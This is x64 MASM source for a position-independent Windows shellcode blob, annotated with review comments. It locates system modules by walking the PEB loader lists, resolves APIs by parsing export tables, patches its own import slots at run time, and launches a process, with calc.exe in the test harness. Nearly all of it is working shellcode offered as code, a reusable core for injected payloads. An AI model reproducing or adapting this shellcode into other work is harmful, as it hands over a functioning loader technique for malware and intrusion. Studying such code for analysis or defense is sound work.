编译工具：VS 或者 DDK 携带的汇编编译器 ml64
option casemap:none
;--------------------------------------------------------------------------------
;set name=Shellcode
;ml /c /coff /Cp /Fl /Gd /nologo %name%.asm
;link /SUBSYSTEM:CONSOLE /DEBUG /DEBUGTYPE:CV %name%.obj /OUT:%name%.exe
;PAUSE
;--------------------------------------------------------------------------------
include shellcode.inc
include macro.asm
.code SHELL                         ; everything up to the next .code is the position-independent blob: stubs, resolvers, helpers and the run-time-patched _imp__* slots all live in this one section
jmp _main ;5                        ; first instruction of the blob: transfer to _main (";5" = encoded length in bytes, the author tracks sizes per instruction)
;--------------------------------------------------------------------------------
; _thunk: shared tail of every import stub.
; In:  rax = address of an _imp__* QWORD slot (left there by the stub's call/pop pair)
; Tail-jumps through the slot. Until the import is resolved the slot holds the
; address of the matching _thunk__* resolver; afterwards it holds the real API
; address (the resolver overwrites the slot, see _thunk__CreateProcessA).
; Touches no register and no stack slot, so the target sees the caller's frame.
;--------------------------------------------------------------------------------
_thunk proc
jmp QWORD ptr [rax] ;2              ; indirect tail-jump, no frame of its own
_thunk endp
;--------------------------------------------------------------------------------
; CreateProcessA: import stub with the same signature as the Win32 API.
; Callers use the ordinary Microsoft x64 convention (rcx,rdx,r8,r9 + stack args and
; shadow space); the stub passes the stack through untouched and clobbers only rax.
; `call @F` pushes the address of the 8-byte slot that follows it as if it were a
; return address; `pop rax` retrieves it, and _thunk jumps through the slot.
; NOTE(review): the slot lives inside the code section and is overwritten at run
; time by _thunk__CreateProcessA, so the SHELL section must be mapped writable as
; well as executable (self-patching code). W^X enforcement and memory scanners
; flag exactly this property; confirm the section attributes chosen at link time.
;--------------------------------------------------------------------------------
CreateProcessA proc
call @F ;5                          ; pushes &_imp__CreateProcessA
_imp__CreateProcessA QWORD offset _thunk__CreateProcessA ;8   ; initially -> resolver, later -> resolved API address
@@:
pop rax ;1                          ; rax = &_imp__CreateProcessA
jmp _thunk ;2
CreateProcessA endp
;--------------------------------------------------------------------------------
; CloseHandle: import stub, same shape as CreateProcessA above.
; Leaves rax = &_imp__CloseHandle (call/pop) and jumps through the slot via _thunk;
; the slot starts out pointing at _thunk__CloseHandle and is overwritten with the
; resolved API address on first use. Arguments and stack pass through untouched.
;--------------------------------------------------------------------------------
CloseHandle proc
call @F                             ; pushes &_imp__CloseHandle
_imp__CloseHandle QWORD offset _thunk__CloseHandle   ; run-time patched slot; section must be writable
@@:
pop rax                             ; rax = &_imp__CloseHandle
jmp _thunk
CloseHandle endp
;--------------------------------------------------------------------------------
; GetStartupInfo: import stub for GetStartupInfoA (note the A-suffixed slot name
; and resolver string); same call/pop + _thunk shape as CreateProcessA.
; NOTE(review): this slot only ever takes effect if its resolver stores the
; resolved address into _imp__GetStartupInfoA and not into another stub's slot —
; check _thunk__GetStartupInfo. Nothing in this file calls the stub; _main clears
; STARTUPINFO.cb by hand instead.
;--------------------------------------------------------------------------------
GetStartupInfo proc
call @F                             ; pushes &_imp__GetStartupInfoA
_imp__GetStartupInfoA QWORD offset _thunk__GetStartupInfo   ; run-time patched slot
@@:
pop rax                             ; rax = &_imp__GetStartupInfoA
jmp _thunk
GetStartupInfo endp
;--------------------------------------------------------------------------------
; _KernelBase: locate a loaded system module without using any import.
; Walks TEB (gs:[0] .NtTib.Self) -> PEB -> PEB_LDR_DATA -> InInitializationOrderModuleList
; and reads the QWORD that follows each LIST_ENTRY (Blink[8] = offset 16 from the
; entry) for the first three entries — this assumes the loader-entry layout declared
; in shellcode.inc places DllBase right after the initialization-order links.
; Out: rax = DllBase of the 3rd entry   (author's comment: kernel32)
;      rcx = DllBase of the 2nd entry   (author's comment: KERNELBASE)
;      rdx = DllBase of the 1st entry   (author's comment: ntdll)
; Clobbers: rax, rcx, rdx only; flags untouched (mov instructions only).
; NOTE(review): the order of modules in the initialization-order list is not a
; documented contract — it depends on the Windows version and on what the process
; loaded before this runs — so the name "_KernelBase" (the function actually returns
; the third entry) and the per-line comments must be verified per target OS.
;--------------------------------------------------------------------------------
_KernelBase proc
mov rax,(_TEB ptr gs:[0]).NtTib.Self                                          ; rax = TEB
mov rax,(_TEB ptr [rax]).ProcessEnvironmentBlock                              ; rax = PEB
mov rax,(_PEB ptr [rax]).Ldr                                                  ; rax = PEB_LDR_DATA
mov rax,(_PEB_LDR_DATA ptr [rax]).InInitializationOrderModuleList.Flink       ; rax = 1st entry
mov rdx,(_LIST_ENTRY ptr [rax]).Blink[SizeOf QWORD] ;ntdll                    ; rdx = DllBase of 1st entry
mov rax,(_LIST_ENTRY ptr [rax]).Flink                                         ; rax = 2nd entry
mov rcx,(_LIST_ENTRY ptr [rax]).Blink[SizeOf QWORD];KERNELBASE                ; rcx = DllBase of 2nd entry
mov rax,(_LIST_ENTRY ptr [rax]).Flink                                         ; rax = 3rd entry
mov rax,(_LIST_ENTRY ptr [rax]).Blink[SizeOf QWORD];kernel32                  ; rax = DllBase of 3rd entry (returned)
ret
_KernelBase endp
;--------------------------------------------------------------------------------
; _StrLen: length of a NUL-terminated string, counting the terminator.
; In:  rax = s
; Out: rax = strlen(s) + 1   (callers such as _StrCmp rely on the +1)
; Preserves rdi and rcx (via `uses`); clobbers flags.
; Written as a plain byte loop instead of `repne scasb`, so it does not depend on
; the direction flag.
;--------------------------------------------------------------------------------
_StrLen proc uses rdi rcx
mov rdi,rax                         ; rdi = s
xor ecx,ecx                         ; rcx = bytes examined so far
@@:
cmp byte ptr [rdi+rcx],0
lea rcx,[rcx+1]                     ; count the byte just examined; lea leaves ZF from the cmp intact
jnz @B                              ; keep going until the NUL itself has been counted
mov rax,rcx                         ; rax = strlen(s) + 1
ret
_StrLen endp
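;--------------------------------------------------------------------------------
; _StrCmp: compare two NUL-terminated strings for equality.
; In:  rsi = a, rdi = b
; Out: rax = 0 when a and b are identical, non-zero otherwise
;      (on a length mismatch rax is strlen(b)+1; on a byte mismatch it is the number
;       of bytes left unscanned — callers must only test for zero)
; Preserves rcx, rsi, rdi (via `uses`); clobbers flags.
; The counts from _StrLen include the terminator, so `repe cmpsb` also compares
; the NULs: rcx can only reach 0 when every byte matched, hence rax = rcx is a
; correct equality result. Assumes DF = 0 (the ABI default) for the string op.
; Removed the second `ret` that followed the label — it was unreachable.
;--------------------------------------------------------------------------------
_StrCmp proc uses rcx rsi rdi
mov rax,rsi
call _StrLen
mov rcx,rax                         ; rcx = strlen(a)+1
mov rax,rdi
call _StrLen                        ; rax = strlen(b)+1
cmp rax,rcx
jnz @F                              ; lengths differ: rax is already non-zero
repe cmpsb                          ; scan while equal; rcx = bytes not yet compared
mov rax,rcx                         ; 0 only if every byte (including the NUL) matched
@@:
ret
_StrCmp endp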
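;--------------------------------------------------------------------------------
; _GetProcAddress: resolve an export by name from an in-memory PE image, no imports.
; In:  rcx = module base (DllBase), rdx = NUL-terminated export name
; Out: rax = address of the export; 0 if the image is not a valid PE32+ image, has
;      no export directory, or the name is not exported
; Preserves rcx, rdx, rsi, rdi, rbx; clobbers rax, r8, r9, r10, flags.
; Fixes vs. the original:
;  - the export-directory RVA was read through `[ebx]`; a 32-bit address operand
;    truncates the 64-bit pointer, so any image mapped above 4 GiB faulted here
;  - the name loop now checks NumberOfNames before the first read, so an export
;    directory with zero names (or VirtualAddress == 0) returns 0 instead of
;    dereferencing garbage
;  - the 2-byte prefix test used si/rsi as scratch; r10 (volatile) is used instead
; NOTE(review): forwarded exports are not detected — for those the value returned
; is the address of the forwarder string inside the export directory, not code.
;--------------------------------------------------------------------------------
_GetProcAddress proc uses rsi rdi rbx
mov rsi,rcx                         ; rsi = image base
movzx eax,(IMAGE_DOS_HEADER ptr [rsi]).e_magic
cmp ax,"ZM"                         ; IMAGE_DOS_SIGNATURE ("MZ" in memory)
jnz fail
mov ebx,(IMAGE_DOS_HEADER ptr [rsi]).e_lfanew
add rbx,rsi                         ; rbx = IMAGE_NT_HEADERS*
mov eax,(IMAGE_NT_HEADERS ptr [rbx]).Signature
cmp eax,"EP"                        ; IMAGE_NT_SIGNATURE ("PE\0\0" in memory)
jnz fail
lea rbx,(IMAGE_NT_HEADERS ptr [rbx]).OptionalHeader
movzx eax,(_IMAGE_OPTIONAL_HEADER64 ptr [rbx]).Magic
cmp ax,20Bh                         ; IMAGE_NT_OPTIONAL_HDR64_MAGIC; PE32 images are rejected
jnz fail
EXP EQU IMAGE_DIRECTORY_ENTRY_EXPORT*SizeOf _IMAGE_DATA_DIRECTORY
mov ebx,(_IMAGE_OPTIONAL_HEADER64 ptr [rbx]).DataDirectory[EXP][_IMAGE_DATA_DIRECTORY.VirtualAddress]
test ebx,ebx
jz fail                             ; no export directory
add rbx,rcx                         ; rbx = IMAGE_EXPORT_DIRECTORY*
mov r9d,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).AddressOfNames
add r9,rcx                          ; r9 = DWORD table of name RVAs
xor r8d,r8d                         ; r8 = name index
jmp chk                             ; bounds check before the first read
re:
mov eax,[r9][r8*4]
add rax,rcx                         ; rax = candidate name (char*)
movzx r10d,word ptr [rax]
cmp r10w,word ptr [rdx]             ; cheap 2-byte prefix test before the full compare
jnz @F
mov rsi,rax
mov rdi,rdx
call _StrCmp                        ; rax = 0 on match
or rax,rax
jnz @F
mov edi,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).AddressOfFunctions
add rdi,rcx                         ; rdi = DWORD table of function RVAs
mov eax,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).AddressOfNameOrdinals
add rax,rcx
movzx eax,word ptr [rax][rax*0][r8*2]
mov eax,[rdi][rax*4]                ; RVA of the function for this name's ordinal
add rax,rcx                         ; rax = export address
jmp done
@@:
inc r8
chk:
cmp r8d,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).NumberOfNames
jb re                               ; unsigned compare on an index
fail:
xor eax,eax                         ; not found / invalid image
done:
ret
_GetProcAddress endp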
;--------------------------------------------------------------------------------
; _thunk__CreateProcessA: first-call resolver behind the CreateProcessA stub.
; Reached by `jmp QWORD ptr [rax]` from _thunk, so the stack is exactly the
; caller's (return address on top, stack arguments and shadow space above it).
; 1. preserve the four register arguments (r9,r8,rdx,rcx) around the lookup
; 2. rcx = module base from _KernelBase; rdx = address of the inline name string
;    (`call @F` pushes the string's address as a "return address", `pop rdx` takes it)
; 3. rax = _GetProcAddress(rcx, rdx); cache it in _imp__CreateProcessA so the stub
;    jumps straight to the API from now on (this store patches the code section)
; 4. restore the argument registers and transfer to the API with `push rax / ret`,
;    leaving the original return address on top so the API returns to the caller
; Only rcx, rdx, r8, r9 are restored; r10/r11 and rax follow the volatile-register
; rules, and the callee-saved registers are restored by the helpers' `uses` lists.
; NOTE(review): a 0 from _GetProcAddress (lookup failed) is not checked — the final
; `ret` would then transfer control to address 0. There is no failure path.
;--------------------------------------------------------------------------------
_thunk__CreateProcessA proc
push r9                             ; save register arguments across the lookup
push r8
push rdx
push rcx
call _KernelBase
mov rcx,rax                         ; rcx = module base
call @F                             ; pushes the address of the name string below
byte "CreateProcessA",0
@@:
pop rdx                             ; rdx = "CreateProcessA"
call _GetProcAddress
mov _imp__CreateProcessA,rax        ; cache in the stub's slot (writes into the code section)
pop rcx                             ; restore register arguments
pop rdx
pop r8
pop r9
push rax
ret                                 ; tail-transfer to the resolved API
_thunk__CreateProcessA endp
;--------------------------------------------------------------------------------
; _thunk__CloseHandle: first-call resolver behind the CloseHandle stub.
; Identical to _thunk__CreateProcessA apart from the name string and the slot:
; saves the register arguments, resolves "CloseHandle" in the module returned by
; _KernelBase, caches the address in _imp__CloseHandle (a store into the code
; section), restores the arguments and transfers to the API via `push rax / ret`
; so that the API returns directly to the original caller.
; NOTE(review): a 0 result from _GetProcAddress is not checked before the `ret`.
;--------------------------------------------------------------------------------
_thunk__CloseHandle proc
push r9                             ; save register arguments across the lookup
push r8
push rdx
push rcx
call _KernelBase
mov rcx,rax                         ; rcx = module base
call @F                             ; pushes the address of the name string below
byte "CloseHandle",0
@@:
pop rdx                             ; rdx = "CloseHandle"
call _GetProcAddress
mov _imp__CloseHandle,rax           ; cache in the stub's slot
pop rcx                             ; restore register arguments
pop rdx
pop r8
pop r9
push rax
ret                                 ; tail-transfer to the resolved API
_thunk__CloseHandle endp
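;--------------------------------------------------------------------------------
; _thunk__GetStartupInfo: first-call resolver behind the GetStartupInfo stub.
; Entered through _thunk with the caller's stack intact. Saves the four register
; arguments, resolves "GetStartupInfoA" in the module returned by _KernelBase,
; caches the address in the stub's own slot, restores the arguments and transfers
; to the API with `push rax / ret` so the API returns straight to the caller.
; Fix: the resolved address used to be stored into _imp__CloseHandle, so every
; later CloseHandle call would have jumped to GetStartupInfoA while this stub kept
; re-resolving on each call. The store now targets _imp__GetStartupInfoA.
; The three _thunk__* resolvers differ only in name string and slot; generating
; them from one macro would have prevented this copy-and-paste slip.
; NOTE(review): a 0 from _GetProcAddress is not checked — `ret` would jump to 0.
;--------------------------------------------------------------------------------
_thunk__GetStartupInfo proc
push r9                             ; save register arguments across the lookup
push r8
push rdx
push rcx
call _KernelBase
mov rcx,rax                         ; rcx = module base
call @F                             ; pushes the address of the name string below
byte "GetStartupInfoA",0
@@:
pop rdx                             ; rdx = "GetStartupInfoA"
call _GetProcAddress
mov _imp__GetStartupInfoA,rax       ; cache in THIS stub's slot (writes into the code section)
pop rcx                             ; restore register arguments
pop rdx
pop r8
pop r9
push rax
ret                                 ; tail-transfer to the resolved API
_thunk__GetStartupInfo endp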
;--------------------------------------------------------------------------------
; _main: create a process from a string and release the two returned handles.
; In:  rcx = pointer to the NUL-terminated string passed as CreateProcessA's first
;      argument (lpApplicationName); WinMainCRTStartup supplies it
; Out: rax = result of the last call made (CloseHandle on the success path,
;      CreateProcessA's 0 on failure) — not a meaningful status, callers should ignore it
; Relies on the @LOCAL / END_LOCAL / fastcall / EPILOG macros from macro.asm, which
; are not visible here; presumably `END_LOCAL QWORD * 10` reserves the 4 shadow +
; 6 stack-argument slots that CreateProcessA's 10 arguments need — verify in macro.asm.
; NOTE(review): only STARTUPINFO.cb is cleared; every other field (dwFlags, the
; std handles, ...) is whatever the stack happened to contain, so CreateProcessA
; may see random STARTF_* flags. Zero the whole structure (rdi is listed in `uses`
; but never referenced in the body) and set cb to SizeOf STARTUPINFO as the API
; documentation requires, or use the GetStartupInfo stub that is defined but never called.
; Handles are closed only when CreateProcessA reports success (eax != 0).
;--------------------------------------------------------------------------------
_main proc uses rdi
@LOCAL _si,STARTUPINFO              ; STARTUPINFO on the stack (macro from macro.asm)
@LOCAL _pi,PROCESS_INFORMATION      ; receives hProcess/hThread
END_LOCAL QWORD * 10                ; frame + outgoing argument area (macro from macro.asm)
and (STARTUPINFO ptr _si).cb,0      ; clears cb only; the rest of _si stays uninitialized
fastcall CreateProcessA,rcx,0,0,0,0,0,0,0,addr _si,addr _pi
or eax,eax
jz @F                               ; failure: nothing to close
fastcall CloseHandle,(PROCESS_INFORMATION ptr _pi).hThread
fastcall CloseHandle,(PROCESS_INFORMATION ptr _pi).hProcess
@@:
EPILOG                              ; frame teardown (macro from macro.asm)
ret
_main endp
.code                               ; back to the ordinary code section: the harness below is not part of the SHELL blob
;--------------------------------------------------------------------------------
; WinMainCRTStartup: stand-alone test entry (linked without a CRT).
; Passes the inline string that follows `call @F` to _main in rcx, using the same
; call/pop trick the stubs use, then returns to the OS.
; The three `int 3` instructions are debugger breakpoints left in for stepping:
; with no debugger attached each one raises an unhandled breakpoint exception that
; terminates the process, so they belong under an `ifdef DEBUG` guard.
; NOTE(review): the `call @F` / `pop rcx` pair nets to zero, so rsp at `call _main`
; is still the entry value (8 mod 16), i.e. not 16-byte aligned at the call site.
; Whether _main's prologue macro realigns cannot be seen here — confirm, since a
; misaligned stack reaching the Win32 API can fault inside SSE code.
;--------------------------------------------------------------------------------
WinMainCRTStartup proc
int 3                               ; debugger trap: stop before anything runs
call @F                             ; pushes the address of the string below
byte "calc.exe",0
@@:
pop rcx                             ; rcx = "calc.exe" (argument for _main)
int 3                               ; debugger trap
call _main
int 3                               ; debugger trap: inspect the result before exiting
ret
WinMainCRTStartup endp
end